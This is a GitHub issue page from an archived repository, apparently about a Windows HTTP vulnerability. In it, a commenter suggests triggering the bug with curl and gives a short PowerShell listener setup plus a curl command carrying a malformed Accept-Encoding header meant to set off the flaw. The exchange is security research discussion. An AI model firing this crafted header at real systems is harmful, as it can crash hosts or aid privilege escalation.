Skip to content
This repository has been archived by the owner on Dec 27, 2023. It is now read-only.

Question - Comment #4

Closed
ghost opened this issue May 19, 2021 · 1 comment
Closed

Question - Comment #4

ghost opened this issue May 19, 2021 · 1 comment

Comments

@ghost
Copy link

ghost commented May 19, 2021

I think you can use curl to exploit as well. Likely local privilege escalation, since a normal user can register a listener on a high port.

$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://localhost:8080/') 
$listener.Start()
curl.exe -H 'Accept-Encoding:  doar-e, ftw, imo, ,' http://localhost:8080/

Also which tool are you using to reverse with, for the images? Very cool

Cheers

@0vercl0k
Copy link
Owner

0vercl0k commented May 19, 2021 via email

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant